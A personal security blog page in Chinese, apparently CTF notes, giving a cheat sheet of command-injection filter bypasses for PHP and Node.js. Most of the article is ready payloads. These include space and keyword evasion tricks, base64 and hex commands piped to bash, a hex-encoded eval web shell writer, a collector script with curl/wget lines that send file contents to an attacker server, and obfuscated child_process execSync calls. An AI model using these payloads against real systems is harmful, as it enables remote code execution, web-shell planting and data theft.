<!doctype html>
<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>命令执行和绕过 - Tlife</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="Tlife"><meta name="msapplication-TileImage" content="/img/favicon.svg"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="Tlife"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="高危函数:system()、exec()、shell_exec()、passthru()、pctnl_exec()、popen()、proc_open() 注：反引号是shell_exec()的别名 代码注入程序过滤不严谨，导致用户可以将代码注入并执行。高危函数:eval()、assert()、preg_replace()、call_user_func()等等和命令执行的区别是：一个执行系统命令，"><meta property="og:type" content="blog"><meta property="og:title" content="命令执行和绕过"><meta property="og:url" content="http://example.com/2021/08/26/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%92%8C%E7%BB%95%E8%BF%87/"><meta property="og:site_name" content="Tlife"><meta property="og:description" content="高危函数:system()、exec()、shell_exec()、passthru()、pctnl_exec()、popen()、proc_open() 注：反引号是shell_exec()的别名 代码注入程序过滤不严谨，导致用户可以将代码注入并执行。高危函数:eval()、assert()、preg_replace()、call_user_func()等等和命令执行的区别是：一个执行系统命令，"><meta property="og:locale" content="en_US"><meta property="og:image" content="http://example.com/img/og_image.png"><meta property="article:published_time" content="2021-08-26T07:53:40.000Z"><meta property="article:modified_time" content="2022-02-11T12:44:58.269Z"><meta property="article:author" content="vague huang"><meta property="twitter:card" content="summary"><meta property="twitter:image:src" content="http://example.com/img/og_image.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://example.com/2021/08/26/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%92%8C%E7%BB%95%E8%BF%87/"},"headline":"命令执行和绕过","image":["http://example.com/img/og_image.png"],"datePublished":"2021-08-26T07:53:40.000Z","dateModified":"2022-02-11T12:44:58.269Z","author":{"@type":"Person","name":"vague huang"},"publisher":{"@type":"Organization","name":"Tlife","logo":{"@type":"ImageObject","url":"http://example.com/img/logo.svg"}},"description":"高危函数:system()、exec()、shell_exec()、passthru()、pctnl_exec()、popen()、proc_open() 注：反引号是shell_exec()的别名 代码注入程序过滤不严谨，导致用户可以将代码注入并执行。高危函数:eval()、assert()、preg_replace()、call_user_func()等等和命令执行的区别是：一个执行系统命令，"}</script><link rel="canonical" href="http://example.com/2021/08/26/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%92%8C%E7%BB%95%E8%BF%87/"><link rel="icon" href="/img/favicon.svg"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v6.0.0/css/all.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css"><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><!--!--><!--!--><!-- hexo injector head_end start --><script>
  (function () {
      function switchTab() {
          if (!location.hash) {
            return;
          }

          const id = '#' + CSS.escape(location.hash.substring(1));
          const $tabMenu = document.querySelector(`.tabs a[href="${id}"]`);
          if (!$tabMenu) {
            return;
          }

          const $tabMenuContainer = $tabMenu.parentElement.parentElement;
          Array.from($tabMenuContainer.children).forEach($menu => $menu.classList.remove('is-active'));
          Array.from($tabMenuContainer.querySelectorAll('a'))
              .map($menu => document.getElementById($menu.getAttribute("href").substring(1)))
              .forEach($content => $content.classList.add('is-hidden'));

          if ($tabMenu) {
              $tabMenu.parentElement.classList.add('is-active');
          }
          const $activeTab = document.querySelector(id);
          if ($activeTab) {
              $activeTab.classList.remove('is-hidden');
          }
      }
      switchTab();
      window.addEventListener('hashchange', switchTab, false);
  })();
  </script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 6.3.0"></head><body class="is-2-column"><nav class="navbar navbar-main"><div class="container navbar-container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/logo.svg" alt="Tlife" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">Home</a><a class="navbar-item" href="/archives">Archives</a><a class="navbar-item" href="/categories">Categories</a><a class="navbar-item" href="/tags">Tags</a><a class="navbar-item" href="/about">About</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus"><i class="fab fa-github"></i></a><a class="navbar-item search" title="Search" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-8-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item">Posted&nbsp;<time dateTime="2021-08-26T07:53:40.000Z" title="2021/8/26 下午3:53:40">2021-08-26</time></span><span class="level-item">Updated&nbsp;<time dateTime="2022-02-11T12:44:58.269Z" title="2022/2/11 下午8:44:58">2022-02-11</time></span><span class="level-item">9 minutes read (About 1351 words)</span></div></div><h1 class="title is-3 is-size-4-mobile">命令执行和绕过</h1><div class="content"><h2 id="高危函数"><a href="#高危函数" class="headerlink" title="高危函数:"></a>高危函数:</h2><p>system()、exec()、shell_exec()、passthru()、pctnl_exec()、popen()、proc_open() 注：反引号是shell_exec()的别名</p>
<h2 id="代码注入"><a href="#代码注入" class="headerlink" title="代码注入"></a>代码注入</h2><p>程序过滤不严谨，导致用户可以将代码注入并执行。高危函数:eval()、assert()、preg_replace()、call_user_func()等等和命令执行的区别是：一个执行系统命令，一个执行PHP代码</p>
<h2 id="bypass"><a href="#bypass" class="headerlink" title="bypass"></a>bypass</h2><h3 id="过滤空格"><a href="#过滤空格" class="headerlink" title="过滤空格"></a>过滤空格</h3><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">$IFS</span><br><span class="line">$&#123;IFS&#125;</span><br><span class="line">$IFS$9</span><br><span class="line">&lt;</span><br><span class="line">&lt;&gt;</span><br><span class="line">&#123;cat,flag.php&#125;&#x2F;&#x2F; 用逗号实现了空格功能，需要用&#123;&#125;括起来</span><br><span class="line">%20</span><br><span class="line">%09</span><br></pre></td></tr></table></figure>

<h3 id="过滤某关键字"><a href="#过滤某关键字" class="headerlink" title="过滤某关键字"></a>过滤某关键字</h3><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">ca\t y1n\g.php反斜线绕过</span><br><span class="line">cat y1”ng.php 两个单引号绕过</span><br><span class="line">echo “Y2F0IC9mbGFn” | base64 -d | bash#base64 编码绕过</span><br><span class="line">echo “6361742079316E672E706870” | xxd -r -p | bash#hex 编码绕过</span><br><span class="line">cat y1 [n] g.php用[]匹配</span><br><span class="line">cat y1n*用*匹配任意</span><br><span class="line">cat y1n?</span><br><span class="line">cat y1&#123;a..z&#125;g </span><br><span class="line">more tlif3</span><br><span class="line">less tlif3</span><br><span class="line">head tlif3</span><br><span class="line">tail tlif3</span><br><span class="line">nl f*</span><br><span class="line">m4 *</span><br></pre></td></tr></table></figure>

<h2 id="escapeshellcmd-escapeshellarg绕过"><a href="#escapeshellcmd-escapeshellarg绕过" class="headerlink" title="escapeshellcmd+escapeshellarg绕过"></a>escapeshellcmd+escapeshellarg绕过</h2><h2 id="无参数rce"><a href="#无参数rce" class="headerlink" title="无参数rce"></a>无参数rce</h2><p>shell_exec等无回显函数</p>
<h3 id="判断方法"><a href="#判断方法" class="headerlink" title="判断方法"></a>判断方法</h3><p>ls;sleep(3)</p>
<h3 id="复制法"><a href="#复制法" class="headerlink" title="复制法"></a>复制法</h3><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">copy flag.php flag.txt</span><br><span class="line">mv flag.php flag.txt</span><br><span class="line">cat flag.php &gt; flag.txt</span><br></pre></td></tr></table></figure>

<h3 id="压缩法"><a href="#压缩法" class="headerlink" title="压缩法"></a>压缩法</h3><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">tar cvf flag.tar flag.php #tar压缩</span><br><span class="line">tar zcvf flag.tar.gz flag.php  #tar解压</span><br><span class="line">zip flag.zip flag.php  #zip压缩</span><br><span class="line">unzip flag.zip  #zip解压</span><br></pre></td></tr></table></figure>

<h3 id="写shell法"><a href="#写shell法" class="headerlink" title="写shell法"></a>写shell法</h3><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">echo 3c3f706870206576616c28245f504f53545b3132335d293b203f3e|xxd -r -ps &gt; webshell.php</span><br><span class="line">&#x2F;&#x2F;echo &quot;&lt;?php @eval(\$_POST[123]); ?&gt;&quot; &gt; webshell.php</span><br></pre></td></tr></table></figure>

<h3 id="利用vps反弹shell"><a href="#利用vps反弹shell" class="headerlink" title="利用vps反弹shell"></a>利用vps反弹shell</h3><h4 id="法一"><a href="#法一" class="headerlink" title="法一"></a>法一</h4><figure class="highlight php"><table><tr><td class="code"><pre><span class="line">在自己的公网服务器站点根目录写入php文件，内容如下：</span><br><span class="line">&lt;!-- record.php --&gt;</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$data =$_GET[<span class="string">&#x27;data&#x27;</span>];</span><br><span class="line">$f = fopen(<span class="string">&quot;flag.txt&quot;</span>, <span class="string">&quot;w&quot;</span>);</span><br><span class="line">fwrite($f,$data);</span><br><span class="line">fclose($f);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>在目标服务器的测试点可以发送下面其中任意一条请求进行测试</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">curl http:&#x2F;&#x2F;*.*.*.**&#x2F;record.php?data&#x3D;&#96;cat flag.php|base64&#96;</span><br><span class="line">wget http:&#x2F;&#x2F;*.*.*.*&#x2F;record.php?data&#x3D;&#96;cat flag.php|base64&#96;</span><br></pre></td></tr></table></figure>



<h4 id="法二"><a href="#法二" class="headerlink" title="法二"></a>法二</h4><p>1.在公网服务器监听监听端口</p>
<figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line">nc -lp <span class="number">9999</span>（端口号）</span><br></pre></td></tr></table></figure>

<p>2.向目标服务器发起http请求，执行curl命令</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">curl ip:9999</span><br></pre></td></tr></table></figure>

<p>参考<a target="_blank" rel="noopener" href="https://bbs.huaweicloud.com/blogs/detail/286904">https://bbs.huaweicloud.com/blogs/detail/286904</a></p>
<h4 id="法三，外带flag"><a href="#法三，外带flag" class="headerlink" title="法三，外带flag"></a>法三，外带flag</h4><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">curl -d @&#x2F;home&#x2F;www-data&#x2F;res.txt http:&#x2F;&#x2F;xx:xxx</span><br><span class="line">curl http:&#x2F;&#x2F;xx:xx&#x2F;?d&#x3D;&#96;php -r &#39;file_&#39;|base64&#96;</span><br><span class="line">echo &#96;ps&#96;&gt;&#x2F;home&#x2F;www-data&#x2F;res.txt</span><br></pre></td></tr></table></figure>

<p>第一条是读取文件内容，第二条是执行命令，可以将执行命令的结果保存为一个文件，然后再去进行读取</p>
<h2 id="nodejs-RCE"><a href="#nodejs-RCE" class="headerlink" title="nodejs RCE"></a>nodejs RCE</h2><h3 id="1-child-process"><a href="#1-child-process" class="headerlink" title="1.child_process"></a>1.child_process</h3><p>child_process是用来执行系统命令模块</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">require(&quot;child_process&quot;).exec(&quot;sleep 3&quot;);</span><br><span class="line">require(&quot;child_process&quot;).execSync(&quot;sleep 3&quot;);</span><br><span class="line">require(&quot;child_process&quot;).execFile(&quot;&#x2F;bin&#x2F;sleep&quot;,[&quot;3&quot;]); &#x2F;&#x2F;调用某个可执行文件，在第二个参数传args</span><br><span class="line">require(&quot;child_process&quot;).spawn(&#39;sleep&#39;, [&#39;3&#39;]);</span><br><span class="line">require(&quot;child_process&quot;).spawnSync(&#39;sleep&#39;, [&#39;3&#39;]);</span><br><span class="line">require(&quot;child_process&quot;).execFileSync(&#39;sleep&#39;, [&#39;3&#39;]);</span><br></pre></td></tr></table></figure>

<h3 id="2-nodejs中的命令执行过滤关键字"><a href="#2-nodejs中的命令执行过滤关键字" class="headerlink" title="2.nodejs中的命令执行过滤关键字"></a>2.nodejs中的命令执行过滤关键字</h3><h4 id="16进制编码绕过"><a href="#16进制编码绕过" class="headerlink" title="16进制编码绕过"></a>16进制编码绕过</h4><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">require(&quot;child_process&quot;)[&quot;exe\x63Sync&quot;](&quot;curl 127.0.0.1:1234&quot;)</span><br></pre></td></tr></table></figure>

<h4 id="unicode编码"><a href="#unicode编码" class="headerlink" title="unicode编码"></a>unicode编码</h4><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">require(&quot;child_process&quot;)[&quot;exe\u0063Sync&quot;](&quot;curl 127.0.0.1:1234&quot;)</span><br></pre></td></tr></table></figure>

<h4 id="加号拼接"><a href="#加号拼接" class="headerlink" title="加号拼接"></a>加号拼接</h4><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">require(&#39;child_process&#39;)[&#39;exe&#39;%2b&#39;cSync&#39;](&#39;curl 127.0.0.1:1234&#39;)</span><br></pre></td></tr></table></figure>

<h4 id="模板字符串"><a href="#模板字符串" class="headerlink" title="模板字符串"></a>模板字符串</h4><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">require(&#39;child_process&#39;)[&#96;$&#123;&#96;$&#123;&#96;exe&#96;&#125;cSync&#96;&#125;&#96;](&#39;curl 127.0.0.1:1234&#39;)</span><br></pre></td></tr></table></figure>

<h4 id="concat连接"><a href="#concat连接" class="headerlink" title="concat连接"></a>concat连接</h4><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">require(&quot;child_process&quot;)[&quot;exe&quot;.concat(&quot;cSync&quot;)](&quot;curl 127.0.0.1:1234&quot;)</span><br></pre></td></tr></table></figure>

<h4 id="base64编码"><a href="#base64编码" class="headerlink" title="base64编码"></a>base64编码</h4><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">eval(Buffer.from(&#39;Z2xvYmFsLnByb2Nlc3MubWFpbk1vZHVsZS5jb25zdHJ1Y3Rvci5fbG9hZCgiY2hpbGRfcHJvY2VzcyIpLmV4ZWNTeW5jKCJjdXJsIDEyNy4wLjAuMToxMjM0Iik&#x3D;&#39;,&#39;base64&#39;).toString())</span><br></pre></td></tr></table></figure>

<h4 id="Obejct-keys"><a href="#Obejct-keys" class="headerlink" title="Obejct.keys"></a>Obejct.keys</h4><p>实际上通过<code>require</code>导入的模块是一个<code>Object</code>，所以就可以用<code>Object</code>中的方法来操作获取内容。利用<code>Object.values</code>就可以拿到<code>child_process</code>中的各个函数方法，再通过数组下标就可以拿到<code>execSync</code></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">console.log(require(&#39;child_process&#39;).constructor&#x3D;&#x3D;&#x3D;Object)</span><br><span class="line">&#x2F;&#x2F;true</span><br><span class="line">Object.values(require(&#39;child_process&#39;))[5](&#39;curl 127.0.0.1:1234&#39;)</span><br></pre></td></tr></table></figure>

<h4 id="Reflect"><a href="#Reflect" class="headerlink" title="Reflect"></a>Reflect</h4><p>在js中，需要使用<code>Reflect</code>这个关键字来实现反射调用函数的方式。譬如要得到<code>eval</code>函数，可以首先通过<code>Reflect.ownKeys(global)</code>拿到所有函数，然后<code>global[Reflect.ownKeys(global).find(x=&gt;x.includes(&#39;eval&#39;))]</code>即可得到eval</p>
<figure class="highlight js"><table><tr><td class="code"><pre><span class="line"><span class="built_in">console</span>.log(<span class="built_in">Reflect</span>.ownKeys(<span class="built_in">global</span>))</span><br><span class="line"><span class="comment">//返回所有函数</span></span><br><span class="line"><span class="built_in">console</span>.log(<span class="built_in">global</span>[<span class="built_in">Reflect</span>.ownKeys(<span class="built_in">global</span>).find(<span class="function"><span class="params">x</span>=&gt;</span>x.includes(<span class="string">&#x27;eval&#x27;</span>))])</span><br><span class="line"><span class="comment">//拿到eval</span></span><br></pre></td></tr></table></figure>

<p>拿到eval之后，就可以常规思路rce了</p>
<figure class="highlight js"><table><tr><td class="code"><pre><span class="line"><span class="built_in">global</span>[<span class="built_in">Reflect</span>.ownKeys(<span class="built_in">global</span>).find(<span class="function"><span class="params">x</span>=&gt;</span>x.includes(<span class="string">&#x27;eval&#x27;</span>))](<span class="string">&#x27;global.process.mainModule.constructor._load(&quot;child_process&quot;).execSync(&quot;curl 127.0.0.1:1234&quot;)&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>这里虽然有可能被检测到的关键字，但由于<code>mainModule</code>、<code>global</code>、<code>child_process</code>等关键字都在字符串里，可以利用上面提到的方法编码，譬如16进制。</p>
<figure class="highlight js"><table><tr><td class="code"><pre><span class="line"><span class="built_in">global</span>[<span class="built_in">Reflect</span>.ownKeys(<span class="built_in">global</span>).find(<span class="function"><span class="params">x</span>=&gt;</span>x.includes(<span class="string">&#x27;eval&#x27;</span>))](<span class="string">&#x27;\x67\x6c\x6f\x62\x61\x6c\x5b\x52\x65\x66\x6c\x65\x63\x74\x2e\x6f\x77\x6e\x4b\x65\x79\x73\x28\x67\x6c\x6f\x62\x61\x6c\x29\x2e\x66\x69\x6e\x64\x28\x78\x3d\x3e\x78\x2e\x69\x6e\x63\x6c\x75\x64\x65\x73\x28\x27\x65\x76\x61\x6c\x27\x29\x29\x5d\x28\x27\x67\x6c\x6f\x62\x61\x6c\x2e\x70\x72\x6f\x63\x65\x73\x73\x2e\x6d\x61\x69\x6e\x4d\x6f\x64\x75\x6c\x65\x2e\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72\x2e\x5f\x6c\x6f\x61\x64\x28\x22\x63\x68\x69\x6c\x64\x5f\x70\x72\x6f\x63\x65\x73\x73\x22\x29\x2e\x65\x78\x65\x63\x53\x79\x6e\x63\x28\x22\x63\x75\x72\x6c\x20\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x3a\x31\x32\x33\x34\x22\x29\x27\x29&#x27;</span>)</span><br></pre></td></tr></table></figure>

<blockquote>
<p>这里还有个小trick，如果过滤了<code>eval</code>关键字，可以用<code>includes(&#39;eva&#39;)</code>来搜索<code>eval</code>函数，也可以用<code>startswith(&#39;eva&#39;)</code>来搜索</p>
</blockquote>
<h4 id="过滤中括号的情况"><a href="#过滤中括号的情况" class="headerlink" title="过滤中括号的情况"></a>过滤中括号的情况</h4><p>在<code>3.2</code>中，获取到eval的方式是通过<code>global</code>数组，其中用到了中括号<code>[]</code>，假如中括号被过滤，可以用<code>Reflect.get</code>来绕</p>
<blockquote>
<p><code>Reflect.get(target, propertyKey[, receiver])</code>的作用是获取对象身上某个属性的值，类似于<code>target[name]</code>。</p>
</blockquote>
<p>所以取eval函数的方式可以变成</p>
<figure class="highlight js"><table><tr><td class="code"><pre><span class="line"><span class="built_in">Reflect</span>.get(<span class="built_in">global</span>, <span class="built_in">Reflect</span>.ownKeys(<span class="built_in">global</span>).find(<span class="function"><span class="params">x</span>=&gt;</span>x.includes(<span class="string">&#x27;eva&#x27;</span>)))</span><br></pre></td></tr></table></figure>

<p>后面拼接上命令执行的payload即可。</p>
<p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/237032">https://www.anquanke.com/post/id/237032</a></p>
<h2 id="bash盲注"><a href="#bash盲注" class="headerlink" title="bash盲注"></a>bash盲注</h2></div><div class="article-licensing box"><div class="licensing-title"><p>命令执行和绕过</p><p><a href="http://example.com/2021/08/26/命令执行和绕过/">http://example.com/2021/08/26/命令执行和绕过/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>Author</h6><p>vague huang</p></div></div><div class="level-item is-narrow"><div><h6>Posted on</h6><p>2021-08-26</p></div></div><div class="level-item is-narrow"><div><h6>Updated on</h6><p>2022-02-11</p></div></div><div class="level-item is-narrow"><div><h6>Licensed under</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="notification is-danger">You need to set <code>install_url</code> to use ShareThis. Please set it in <code>_config.yml</code>.</div></article></div><div class="card"><div class="card-content"><h3 class="menu-label has-text-centered">Like this article? Support the author with</h3><div class="buttons is-centered"><a class="button donate" href="/" target="_blank" rel="noopener" data-type="afdian"><span class="icon is-small"><i class="fas fa-charging-station"></i></span><span>Afdian.net</span></a><a class="button donate" data-type="alipay"><span class="icon is-small"><i class="fab fa-alipay"></i></span><span>Alipay</span><span class="qrcode"><img src="/" alt="Alipay"></span></a><a class="button donate" href="/" target="_blank" rel="noopener" data-type="buymeacoffee"><span class="icon is-small"><i class="fas fa-coffee"></i></span><span>Buy me a coffee</span></a><a class="button donate" href="/" target="_blank" rel="noopener" data-type="patreon"><span class="icon is-small"><i class="fab fa-patreon"></i></span><span>Patreon</span></a><div class="notification is-danger">You forgot to set the <code>business</code> or <code>currency_code</code> for Paypal. Please set it in <code>_config.yml</code>.</div><a class="button donate" data-type="wechat"><span class="icon is-small"><i class="fab fa-weixin"></i></span><span>Wechat</span><span class="qrcode"><img src="/" alt="Wechat"></span></a></div></div></div><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2021/08/30/2021%E7%A5%A5%E4%BA%91%E6%9D%AF%E9%A2%98%E8%A7%A3/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">2021祥云杯web题解</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2021/08/26/%E6%AD%A3%E5%88%99%E5%8C%B9%E9%85%8D%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8/"><span class="level-item">正则匹配时间盲注</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><div class="card"><div class="card-content"><h3 class="title is-5">Comments</h3><div class="notification is-danger">You forgot to set the <code>shortname</code> for Disqus. Please set it in <code>_config.yml</code>.</div></div></div></div><div class="column column-left is-4-tablet is-4-desktop is-4-widescreen  order-1"><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar" src="/img/avatar.png" alt="Your name"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">Your name</p><p class="is-size-6 is-block">Your title</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>Your location</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">Posts</p><a href="/archives"><p class="title">255</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Categories</p><a href="/categories"><p class="title">0</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Tags</p><a href="/tags"><p class="title">18</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/ppoffice" target="_blank" rel="noopener">Follow</a></div><div class="level is-mobile is-multiline"><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Github" href="https://github.com/ppoffice"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Facebook" href="https://facebook.com"><i class="fab fa-facebook"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Twitter" href="https://twitter.com"><i class="fab fa-twitter"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Dribbble" href="https://dribbble.com"><i class="fab fa-dribbble"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="RSS" href="/"><i class="fas fa-rss"></i></a></div></div></div><!--!--><div class="card widget" data-type="links"><div class="card-content"><div class="menu"><h3 class="menu-label">Links</h3><ul class="menu-list"><li><a class="level is-mobile" href="https://hexo.io" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">Hexo</span></span><span class="level-right"><span class="level-item tag">hexo.io</span></span></a></li><li><a class="level is-mobile" href="https://bulma.io" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">Bulma</span></span><span class="level-right"><span class="level-item tag">bulma.io</span></span></a></li></ul></div></div></div><!--!--><div class="card widget" data-type="recent-posts"><div class="card-content"><h3 class="menu-label">Recents</h3><article class="media"><div class="media-content"><p class="date"><time dateTime="2023-02-14T05:23:36.000Z">2023-02-14</time></p><p class="title"><a href="/2023/02/14/access%E6%95%B0%E6%8D%AE%E5%BA%93%E6%B3%A8%E5%85%A5/"> </a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2023-01-20T06:32:13.000Z">2023-01-20</time></p><p class="title"><a href="/2023/01/20/java-jndi%E6%B3%A8%E5%85%A5/">java-jndi注入</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2023-01-15T06:32:13.000Z">2023-01-15</time></p><p class="title"><a href="/2023/01/15/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/">shiro反序列化漏洞</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2023-01-12T06:32:13.000Z">2023-01-12</time></p><p class="title"><a href="/2023/01/12/javacc4/">java-cc4、cc2、cc5、cc7</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2023-01-10T06:32:13.000Z">2023-01-10</time></p><p class="title"><a href="/2023/01/10/java_cc%E9%93%BE%E5%B0%8F%E7%BB%93/">java_cc链小结</a></p></div></article></div></div><div class="card widget" data-type="archives"><div class="card-content"><div class="menu"><h3 class="menu-label">Archives</h3><ul class="menu-list"><li><a class="level is-mobile" href="/archives/2023/02/"><span class="level-start"><span class="level-item">February 2023</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2023/01/"><span class="level-start"><span class="level-item">January 2023</span></span><span class="level-end"><span class="level-item tag">8</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/12/"><span class="level-start"><span class="level-item">December 2022</span></span><span class="level-end"><span class="level-item tag">5</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/11/"><span class="level-start"><span class="level-item">November 2022</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/10/"><span class="level-start"><span class="level-item">October 2022</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/09/"><span class="level-start"><span class="level-item">September 2022</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/08/"><span class="level-start"><span class="level-item">August 2022</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/07/"><span class="level-start"><span class="level-item">July 2022</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/05/"><span class="level-start"><span class="level-item">May 2022</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/04/"><span class="level-start"><span class="level-item">April 2022</span></span><span class="level-end"><span class="level-item tag">8</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/03/"><span class="level-start"><span class="level-item">March 2022</span></span><span class="level-end"><span class="level-item tag">15</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/02/"><span class="level-start"><span class="level-item">February 2022</span></span><span class="level-end"><span class="level-item tag">17</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/01/"><span class="level-start"><span class="level-item">January 2022</span></span><span class="level-end"><span class="level-item tag">5</span></span></a></li><li><a class="level is-mobile" href="/archives/2021/12/"><span class="level-start"><span class="level-item">December 2021</span></span><span class="level-end"><span class="level-item tag">8</span></span></a></li><li><a class="level is-mobile" href="/archives/2021/11/"><span class="level-start"><span class="level-item">November 2021</span></span><span class="level-end"><span class="level-item tag">12</span></span></a></li><li><a class="level is-mobile" href="/archives/2021/10/"><span class="level-start"><span class="level-item">October 2021</span></span><span class="level-end"><span class="level-item tag">18</span></span></a></li><li><a class="level is-mobile" href="/archives/2021/09/"><span class="level-start"><span class="level-item">September 2021</span></span><span class="level-end"><span class="level-item tag">18</span></span></a></li><li><a class="level is-mobile" href="/archives/2021/08/"><span class="level-start"><span class="level-item">August 2021</span></span><span class="level-end"><span class="level-item tag">11</span></span></a></li><li><a class="level is-mobile" href="/archives/2021/07/"><span class="level-start"><span class="level-item">July 2021</span></span><span class="level-end"><span class="level-item tag">16</span></span></a></li><li><a class="level is-mobile" href="/archives/2021/06/"><span class="level-start"><span class="level-item">June 2021</span></span><span class="level-end"><span class="level-item tag">7</span></span></a></li><li><a class="level is-mobile" 